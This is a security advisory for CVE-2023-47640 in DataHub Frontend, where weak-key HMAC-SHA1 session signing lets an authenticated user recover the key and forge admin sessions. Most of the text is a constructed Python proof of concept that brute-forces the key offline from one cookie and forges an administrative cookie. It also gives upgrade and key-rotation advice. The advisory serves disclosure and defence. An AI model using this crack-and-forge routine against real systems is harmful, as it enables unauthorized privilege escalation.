Insecure Use of HMAC-SHA1 For Session Signing in datahub
CVE-2023-47640
CVSS 8.8 HIGH
What is CVE-2023-47640?
DataHub Frontend signs its session cookie with HMAC-SHA1 through the Play Framework's LegacyCookiesModule, and with that module's default configuration the signing key is too short to resist a brute-force search. Cookie verification is a plain HMAC check, so an attacker who holds any valid session cookie (that is, any authenticated user) can recover the signing key offline by testing candidate keys against the signature on their own cookie; no further requests to the server are needed, so rate limiting and lockouts do not apply. Once the key is known, the attacker can mint a cookie for any session, including an administrative one, and escalate privileges within the platform. Upgrade to version 0.11.1 and rotate the session signing secret: the upgrade alone does not replace a key that may already have been recovered from an existing cookie.
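The attack path above, as an added illustration that is not DataHub or Play code: a cookie signed under a short HMAC-SHA1 key is cracked offline from a single low-privilege cookie, the recovered key is used to forge an administrative cookie, and the server accepts it. The cookie layout `<hex hmac>-<payload>`, the `actor=...` attribute names, and the 3-character secret are constructed assumptions chosen so the search finishes in well under a second; the hardened variant shows the minimum a fix needs, a long random secret that is regenerated on upgrade.

```python
"""Weak-key HMAC-SHA1 cookie signing: why a short secret lets any cookie
holder forge any session.  Constructed illustration, not DataHub or Play
code; the cookie layout "<hex hmac>-<payload>" and the attribute names
are assumptions."""
import hashlib
import hmac
import itertools
import secrets
import string

# Session attribute the (assumed) frontend trusts for authorization.
ADMIN_PAYLOAD = "actor=urn:li:corpuser:datahub"  # assumed attribute/value


def sign_cookie(secret: bytes, payload: str) -> str:
    """Sign a session payload the way a legacy HMAC-SHA1 cookie would."""
    mac = hmac.new(secret, payload.encode(), hashlib.sha1).hexdigest()
    return f"{mac}-{payload}"


def verify_cookie(secret: bytes, cookie: str):
    """Return the payload if the cookie's MAC matches, else None."""
    mac, _, payload = cookie.partition("-")
    expected = hmac.new(secret, payload.encode(), hashlib.sha1).hexdigest()
    return payload if hmac.compare_digest(mac, expected) else None


def crack_secret(cookie: str, alphabet: str, max_len: int):
    """Offline brute force of the signing key from one observed cookie.

    The attacker only needs a cookie they legitimately hold (the
    'authenticated' precondition in the advisory); nothing is sent to
    the server, so rate limiting and lockouts never see the attempts.
    """
    mac, _, payload = cookie.partition("-")
    target = bytes.fromhex(mac)
    data = payload.encode()
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars).encode()
            if hmac.digest(candidate, data, "sha1") == target:
                return candidate
    return None


def forge_cookie(cracked_secret: bytes, payload: str = ADMIN_PAYLOAD) -> str:
    """With the key recovered, any session the attacker wants is signable."""
    return sign_cookie(cracked_secret, payload)


def secret_is_strong(secret: bytes, min_bytes: int = 32) -> bool:
    """Minimum hardening check: a 32-byte random secret (above SHA-1's
    20-byte output) is out of brute-force reach.  Generate it with
    secrets.token_bytes, never a typed string, and rotate it on upgrade."""
    return len(secret) >= min_bytes


def demo():
    # Constructed weak deployment: 3-char secret over a 36-symbol alphabet
    # (about 48k candidates), small enough to exhaust almost instantly.
    alphabet = string.ascii_lowercase + string.digits
    weak_secret = b"k7q"
    low_priv_cookie = sign_cookie(weak_secret, "actor=urn:li:corpuser:jdoe")

    cracked = crack_secret(low_priv_cookie, alphabet, max_len=3)
    forged = forge_cookie(cracked)
    accepted = verify_cookie(weak_secret, forged)  # server accepts forgery

    # Hardened deployment: 256-bit random secret.
    strong_secret = secrets.token_bytes(32)
    return {
        "cracked": cracked,
        "forged_accepted_as": accepted,
        "weak_is_strong": secret_is_strong(weak_secret),
        "strong_is_strong": secret_is_strong(strong_secret),
    }


if __name__ == "__main__":
    print(demo())
```

The search cost is what matters: it scales with the alphabet size raised to the key length, so a short key drawn from a typed-in string falls in seconds to hours on a laptop, while a 32-byte secret from `secrets.token_bytes` cannot be exhausted. SHA-1's own collision weakness is not what makes this exploitable; the same offline search works against HMAC-SHA256 under an equally short key, which is why the remediation is a longer, rotated secret rather than just a different hash.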
Affected Version(s)
datahub < 0.11.1
